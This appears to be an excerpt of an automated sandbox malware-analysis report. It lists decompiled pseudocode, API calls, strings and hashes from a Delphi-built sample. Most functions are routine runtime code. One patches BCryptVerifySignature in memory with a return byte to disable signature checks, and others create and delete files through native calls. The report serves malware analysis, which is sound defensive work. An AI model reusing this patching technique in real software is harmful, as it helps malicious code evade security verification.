				struct HINSTANCE__* _t64;
				void* _t66;

				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
				_t64 = 0;
				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
					L14:
					return _t64;
				} else {
					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
					L5:
					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
						_t56 = _t56 - 1;
						goto L5;
					}
					_t32 = _t66 - 0x11d;
					if(_t56 != _t32) {
						_t57 =  &(_t56[1]);
						if( *(_t66 - 0x12) != 0) {
							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
						}
						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							if(_t64 == 0) {
								 *((char*)(_t66 - 0xb)) = 0;
								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							}
						}
					}
					goto L14;
				}
			}

0x03265bac
0x03265bbf
0x03265bc4
0x03265bcd
0x03265cb6
0x03265cbd
0x03265be3
0x03265bf7
0x03265bfc
0x03265bff
0x03265bfb
0x00000000
0x03265bfb
0x03265c0b
0x03265c13
0x03265c19
0x03265c1e
0x03265c31
0x03265c46
0x03265c46
0x03265c4a
0x03265c69
0x03265c7e
0x03265c82
0x03265c84
0x03265c9f
0x03265cb4
0x03265cb4
0x03265c82
0x03265c4a
0x00000000
0x03265c13

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03265BAC
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03265BB9
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03265BBF
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 03265BEA
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03265C31
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03265C41
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03265C69
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03265C79
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03265C9F
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 03265CAF

Strings

Software\Borland\Locales, xrefs: 03265AC0, 03265ADE
Software\Borland\Delphi\Locales, xrefs: 03265AFC

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
Instruction ID: 56ee514624d08ef8abe8aa5c71c9fa44d5bfed631f14b09c616007099b5c3c5b
Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
Instruction Fuzzy Hash: C831B671E5066D2AFB25D6B4CC86FDFB7AC4F05380F0401E19605E61C5EAB4AED88B90

Uniqueness

Uniqueness Score: -1.00%

Function 03277B14 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03277B14(void* __eax, CHAR* __ecx) {
				long _v20;
				void _v24;
				intOrPtr _v36;
				void* _t7;
				long _t10;
				WCHAR* _t13;
				CHAR* _t17;
				struct HINSTANCE__* _t18;
				void* _t19;

				_t17 = __ecx;
				_t19 = __eax;
				_v24 = 0xc3;
				_t10 = 0;
				_t18 = LoadLibraryW(_t13);
				if(_t18 > 0) {
					_t7 = GetProcAddress(_t18, _t17);
					if(_t7 != 0) {
						NtWriteVirtualMemory(_t19, _t7,  &_v24, 1,  &_v20);
						if(_v36 > 0) {
							_t10 = 1;
						}
					}
					FreeLibrary(_t18);
				}
				return _t10;
			}

0x03277b1b
0x03277b1d
0x03277b1f
0x03277b23
0x03277b2b
0x03277b2f
0x03277b33
0x03277b3a
0x03277b4a
0x03277b54
0x03277b56
0x03277b56
0x03277b54
0x03277b59
0x03277b59
0x03277b66

APIs

LoadLibraryW.KERNEL32(bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,0329E3D8,ScanString,0329E35C,03279F4C), ref: 03277B26
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 03277B33
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize), ref: 03277B4A
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,0329E3D8), ref: 03277B59

Strings

bcrypt, xrefs: 03277B25
BCryptVerifySignature, xrefs: 03277B31

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 923a967787751e240ebbd6fd4fa39d26f7f32154ba0ff206837c286df80b68bd
Instruction ID: dfa442d5a284e335e3144c39c151ab76218b4a5a96bf103c4ea1c46fd8ba5242
Opcode Fuzzy Hash: 923a967787751e240ebbd6fd4fa39d26f7f32154ba0ff206837c286df80b68bd
Instruction Fuzzy Hash: 5FF0E9351163557DD220E1685D44E7F675CDFC2760F08463DB9548B180DAB1888583F2

Uniqueness

Uniqueness Score: -1.00%

Function 0327CB04 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E0327CB04(char __eax, void* __ebx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				void* _v16;
				char _v24;
				void* _v32;
				void* _v56;
				intOrPtr _t52;
				char _t54;
				void* _t58;

				_v12 = __edx;
				_v8 = __eax;
				E03264954(_v8);
				E03264EE4( &_v12);
				_push(_t58);
				_push(0x327cbd6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t58 + 0xffffffcc;
				_push(0);
				_push(0);
				_push( &_v24);
				_push(E03264DB4(_v12));
				L0327CA44();
				E0327CA4C( &_v56, 0x40,  &_v24, 0, 0, 0);
				NtCreateFile( &_v16, 0x100002,  &_v56,  &_v32, 0, 0, 1, 2, 0x20, 0, 0);
				_t54 = _v8;
				if(_t54 != 0) {
					_t54 =  *((intOrPtr*)(_t54 - 4));
				}
				_push(0);
				_push(0);
				_push(_t54);
				_push(E032649BC( &_v8));
				_push( &_v32);
				_push(0);
				_push(0);
				_push(0);
				_push(_v16);
				L03277D30();
				NtClose(_v16);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x327cbdd);
				E03264C24( &_v12);
				return E032644A0( &_v8);
			}

0x0327cb0c
0x0327cb0f
0x0327cb15
0x0327cb1d
0x0327cb24
0x0327cb25
0x0327cb2a
0x0327cb2d
0x0327cb32
0x0327cb34
0x0327cb39
0x0327cb42
0x0327cb43
0x0327cb59
0x0327cb7d
0x0327cb82
0x0327cb87
0x0327cb8c
0x0327cb8c
0x0327cb8e
0x0327cb90
0x0327cb92
0x0327cb9b
0x0327cb9f
0x0327cba0
0x0327cba2
0x0327cba4
0x0327cba9
0x0327cbaa
0x0327cbb3
0x0327cbba
0x0327cbbd
0x0327cbc0
0x0327cbc8
0x0327cbd5

APIs

Part of subcall function 03264EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03264EF2

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0327CBD6), ref: 0327CB43
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0327CB7D
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0327CBAA
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0327CBB3

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 6a0a75f87ae26e85b6d10f29ebb649dd1b315acb635aacff8cb854880e3c1c47
Instruction ID: 6d590e5791f8ac703b358c19928e5d120a6c691f097a73c899fb424a44d4c916
Opcode Fuzzy Hash: 6a0a75f87ae26e85b6d10f29ebb649dd1b315acb635aacff8cb854880e3c1c47
Instruction Fuzzy Hash: 8E21CD75A90318BAEB10EAA5CC46F9EB7BCEF04B10F614461B650FB1C0D7B46E8486A4

Uniqueness

Uniqueness Score: -1.00%

Function 0327CA74 Relevance: 4.5, APIs: 3, Instructions: 45
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0327CA74(short __eax, void* __ebx) {
				short _v8;
				void* _v16;
				void* _v40;
				intOrPtr _t33;
				void* _t36;

				_v8 = __eax;
				E03264EE4( &_v8);
				_push(_t36);
				_push(0x327caee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36 + 0xffffffdc;
				RtlInitUnicodeString( &_v16,  &_v8);
				_push(0);
				_push(0);
				_push( &_v16);
				_push(E03264DB4(_v8));
				L0327CA44();
				E0327CA4C( &_v40, 0x40,  &_v16, 0, 0, 0);
				NtDeleteFile( &_v40);
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x327caf5);
				return E03264C24( &_v8);
			}

0x0327ca7b
0x0327ca81
0x0327ca88
0x0327ca89
0x0327ca8e
0x0327ca91
0x0327ca9c
0x0327caa1
0x0327caa3
0x0327caa8
0x0327cab1
0x0327cab2
0x0327cac8
0x0327cad1
0x0327cada
0x0327cadd
0x0327cae0
0x0327caed

APIs

Part of subcall function 03264EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03264EF2

RtlInitUnicodeString.N(?,?,00000000,0327CAEE), ref: 0327CA9C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0327CAEE), ref: 0327CAB2
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0327CAEE), ref: 0327CAD1

Part of subcall function 03264C24: SysFreeString.OLEAUT32(0327D70C), ref: 03264C32

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: 577531467761520fc4789875c27a27278972a3fbf59ed85629ad69086934d57e
Instruction ID: f91f47a0d4b390cf080bdf8d14546f63355fa4e7a01bb62f46cde9810f9b808e
Opcode Fuzzy Hash: 577531467761520fc4789875c27a27278972a3fbf59ed85629ad69086934d57e
Instruction Fuzzy Hash: A101FF7991030CBEDB01EFB4CD52FCEB7FCFB48604F514462A604E6580EBB4AB4496A4

Uniqueness

Uniqueness Score: -1.00%

Function 03267FB6 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03267FB6(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E0326539C(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E0326539C(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

0x03267fbf
0x03267fc4
0x03267fc6
0x03267fc6
0x03267fd9
0x03267fe8
0x03267feb
0x03267ff8
0x03267ffb
0x03268000
0x03268003
0x03268005
0x03268012
0x03268015
0x0326801a
0x0326801d
0x0326801f
0x03268028

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 03267FD9

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 7cd56386601e5bded6be262e9dd390575e027af0f6e0fee89c279f759f26a8f2
Instruction ID: 90d20bf377b63e28cba18e238db25e51e2d315fb6e798bd95abafa3dd286775b
Opcode Fuzzy Hash: 7cd56386601e5bded6be262e9dd390575e027af0f6e0fee89c279f759f26a8f2
Instruction Fuzzy Hash: CE1112B5E00209AFDB00CF99C880DAFF7F9EFC8600B14C569A404EB250E6719E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0326A7A8 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0326A7A8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E032644F4(_t10, _t18);
				}
				return E03264590(_t10, _t5 - 1,  &_v260, _t19);
			}

0x0326a7b3
0x0326a7b5
0x0326a7c6
0x0326a7cb
0x0326a7cd
0x00000000
0x0326a7e5
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0326A7C6

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: c5002ac666217e3fc8018e8c2be572dce496c21dd53c59d62ff8594365e5cde6
Instruction ID: 92ad3a893dd82377cf0eecde264dc8dad23327356be33b082fb5c524d823e099
Opcode Fuzzy Hash: c5002ac666217e3fc8018e8c2be572dce496c21dd53c59d62ff8594365e5cde6
Instruction Fuzzy Hash: 26E0927572021417D311E6695C819EA726CAF68250F00426AAD45DF340EDF09DC082E4

Uniqueness

Uniqueness Score: -1.00%

Function 0326B770 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0326B770() {
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _t7;
				struct _OSVERSIONINFOA* _t18;

				_t18->dwOSVersionInfoSize = 0x94;
				_t7 = GetVersionExA(_t18);
				if(_t7 != 0) {
					 *0x32897c0 = _v132;
					 *0x32897c4 = _v144;
					 *0x32897c8 = _v140;
					if( *0x32897c0 != 1) {
						 *0x32897cc = _v136;
					} else {
						 *0x32897cc = _v136 & 0x0000ffff;
					}
					return E03264710(0x32897d0, 0x80,  &_v128);
				}
				return _t7;
			}

0x0326b776
0x0326b77e
0x0326b785
0x0326b78b
0x0326b794
0x0326b79d
0x0326b7a9
0x0326b7bf
0x0326b7ab
0x0326b7b4
0x0326b7b4
0x00000000
0x0326b7d2
0x0326b7dd

APIs

GetVersionExA.KERNEL32(?,03288106,00000000,0328811E), ref: 0326B77E

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 4780b526f1a7682b53b4ca9d1f3986adf45b3592f0154431b69fe115150d0772
Instruction ID: cb29c7e40706061d0e5233fd63b2ffe577a3660ad4c3407055556d5c167f465d
Opcode Fuzzy Hash: 4780b526f1a7682b53b4ca9d1f3986adf45b3592f0154431b69fe115150d0772
Instruction Fuzzy Hash: 69F0B7B95153029FF750EF29E444A2577E4FB48714F04892DE899C7384E73894C4CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0326A7F4 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0326A7F4(int __eax, signed int __ecx, int __edx) {
				char _v16;
				signed int _t5;
				signed int _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16 & 0x000000ff;
				}
				return _t5;
			}

0x0326a7f7
0x0326a7f8
0x0326a80e
0x0326a816
0x0326a810
0x0326a810
0x0326a810
0x0326a81c

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0326BE56,00000000,0326C06F,?,?,00000000,00000000), ref: 0326A807

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7e8920f8d0d2d0f23a6a7b610fcb7e2c8d9d986827befababdb0fca97cc2ae55
Instruction ID: 46d126beb05d57990f4c4a21f1dfa220bb2fedcecf75398f3c30070f7d8be6f4
Opcode Fuzzy Hash: 7e8920f8d0d2d0f23a6a7b610fcb7e2c8d9d986827befababdb0fca97cc2ae55
Instruction Fuzzy Hash: 1FD05EB632D2612AE210915A3D84D7B5ADCCEC66A1F04807AB688DB100E2408C8693B1

Uniqueness

Uniqueness Score: -1.00%

Function 032691F0 Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032691F0() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}

0x032691f4
0x03269200

APIs

GetLocalTime.KERNEL32 ref: 032691F4

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: f4f18dacdc05837cd8c7ce478f2f875bfbac66a52ed17a04de46c01d51863990
Instruction ID: 9d0e38e348573b05ad690d3ea69351774f4058184a384d1dc5effbb8b295cf84
Opcode Fuzzy Hash: f4f18dacdc05837cd8c7ce478f2f875bfbac66a52ed17a04de46c01d51863990
Instruction Fuzzy Hash: E3A0121440582015814033180C0217830405C01520FC8074468F8A42E0E91D01A04193

Uniqueness

Uniqueness Score: -1.00%

Function 032620C4 Relevance: .1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E032620C4(void* __eax, char* __edx) {
				char* _t103;

				_t103 = __edx;
				_t39 = __eax + 1;
				 *__edx = 0xffffffff89705f71;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
				_t37 = _t103 + 1; // 0x1
				return _t37;
			}

0x032620c5
0x032620c7
0x032620e9
0x032620f0
0x03262101
0x0326210c
0x0326211d
0x03262128
0x03262139
0x03262144
0x03262155
0x03262160
0x03262171
0x0326217c
0x0326218d
0x03262198
0x032621a9
0x032621b4
0x032621c5
0x032621cd
0x032621d6
0x032621d8
0x032621dc

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 0326D278 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0326D278() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x329e22c = E0326D24C("VariantChangeTypeEx", E0326CDE4, _t91);
				 *0x329e230 = E0326D24C("VarNeg", E0326CE14, _t91);
				 *0x329e234 = E0326D24C("VarNot", E0326CE14, _t91);
				 *0x329e238 = E0326D24C("VarAdd", E0326CE20, _t91);
				 *0x329e23c = E0326D24C("VarSub", E0326CE20, _t91);
				 *0x329e240 = E0326D24C("VarMul", E0326CE20, _t91);
				 *0x329e244 = E0326D24C("VarDiv", E0326CE20, _t91);
				 *0x329e248 = E0326D24C("VarIdiv", E0326CE20, _t91);
				 *0x329e24c = E0326D24C("VarMod", E0326CE20, _t91);
				 *0x329e250 = E0326D24C("VarAnd", E0326CE20, _t91);
				 *0x329e254 = E0326D24C("VarOr", E0326CE20, _t91);
				 *0x329e258 = E0326D24C("VarXor", E0326CE20, _t91);
				 *0x329e25c = E0326D24C("VarCmp", E0326CE2C, _t91);
				 *0x329e260 = E0326D24C("VarI4FromStr", E0326CE38, _t91);
				 *0x329e264 = E0326D24C("VarR4FromStr", E0326CEA4, _t91);
				 *0x329e268 = E0326D24C("VarR8FromStr", E0326CF10, _t91);
				 *0x329e26c = E0326D24C("VarDateFromStr", E0326CF7C, _t91);
				 *0x329e270 = E0326D24C("VarCyFromStr", E0326CFE8, _t91);
				 *0x329e274 = E0326D24C("VarBoolFromStr", E0326D054, _t91);
				 *0x329e278 = E0326D24C("VarBstrFromCy", E0326D0D4, _t91);
				 *0x329e27c = E0326D24C("VarBstrFromDate", E0326D144, _t91);
				_t46 = E0326D24C("VarBstrFromBool", E0326D1B8, _t91);
				 *0x329e280 = _t46;
				return _t46;
			}

0x0326d286
0x0326d29a
0x0326d2b0
0x0326d2c6
0x0326d2dc
0x0326d2f2
0x0326d308
0x0326d31e
0x0326d334
0x0326d34a
0x0326d360
0x0326d376
0x0326d38c
0x0326d3a2
0x0326d3b8
0x0326d3ce
0x0326d3e4
0x0326d3fa
0x0326d410
0x0326d426
0x0326d43c
0x0326d452
0x0326d462
0x0326d468
0x0326d46f

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0326D281

Part of subcall function 0326D24C: GetProcAddress.KERNEL32(00000000), ref: 0326D265

Strings

VarSub, xrefs: 0326D2E7
VariantChangeTypeEx, xrefs: 0326D28F
VarBoolFromStr, xrefs: 0326D41B
VarAnd, xrefs: 0326D355
VarNeg, xrefs: 0326D2A5
VarI4FromStr, xrefs: 0326D3AD
VarBstrFromBool, xrefs: 0326D45D
VarAdd, xrefs: 0326D2D1
VarIdiv, xrefs: 0326D329
